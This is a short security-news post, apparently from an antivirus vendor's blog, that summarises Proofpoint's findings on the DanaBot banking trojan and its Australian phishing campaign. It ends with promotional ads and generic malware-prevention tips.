DanaBot, a new banking trojan has appeared out of nowhere that primarily targets users in Australia.
This malware is written in Delphi and is currently underdeveloped, has only been operated by one malware developer dubbed TA547 so far.
This malware developer seems to have bought banking malware from other malware developers and operators.
TA547 has been active since Nov 2017 and has distributed other malware variants including Gootkit, Ursnif, Panda Baker, Atmos, Mazer Bot, Corebot, as well as the Red Alert Android malware. Countries previously under target by this malware developer include Germany, UK, Australia, and Italy.
There are a few pieces of evidence showing that the malware might have been spread by other malware developers since few samples of the malware were discovered suggesting the same.
Phishing emails containing malicious URLs are used to distribute DanaBot. These URLs redirects the target to a Word document presented on a third-party site.
Get peace of mind! Get rid of malicious programs instantly
Free Checkup & fix for your PC! Get rid of malicious programs instantly!
This malicious document, when activated, downloads the DanaBot trojan by utilizing a PowerShell command.
The document also contains stolen and copied branding that claims to be protected by a security vendor.
The trojan also checks the target’s location and only attacks users in Australia. The trojan comes with spying capabilities i.e., banking id & passwords, credit card details, etc.
It also steals system’s detailed system information like system IP address, version of operating system, and many such details.
Files stored on the hard disk and a screenshot of the user’s desktop - all of which it sends to the Control and Command Center.
“Currently, this trojan is under-development and there seem to be two versions. We observed the first in a campaign around May 6 and 7 while the second appeared around May 29.
However, we found even earlier samples via pivots in malware repositories that date from the middle of April but we have not seen these in the wild,” Proofpoint researchers, who discovered DanaBot, said in a blog.
DanaBot currently targets users of several popular email clients, including Outlook and Windows Live Mail. The malware also targets users of instant messengers such as Trillian, Digsby, and Miranda.
Are you worried about your PC health?
Check your PC Health for Free!
Tips to Prevent virus and malware from Infecting Your System:
- Enable your popup blocker: Pop-ups and ads on the websites are the most adoptable tactic used by cybercriminals or developers with the core intention to spread malicious programs.
So, avoid clicking uncertain sites, software offers, pop-ups etc. and Install a powerful ad- blocker for Chrome, Mozilla, and IE
- Keep your Windows Updated: To avoid such infections, we recommend that you should always keep your system updated through automatic windows update.By doing this you can keep your device free from virus.According to the survey, outdated/older versions of Windows operating system are an easy target.
- Third-party installation: Try to avoid freeware download websites as they usually install bundled of software with any installer or stub file.
- Regular Backup: Regular and periodical backup helps you to keep your data safe in case the system is infected by any kind of virus or any other infection.Thus always backup important files regularly on a cloud drive or an external hard drive.
- Always have an Anti-Virus: Precaution is better than cure. We recommend that you install an antivirus like ITL Total Security or a good Malware Removal Tool like Download Virus RemovalTool
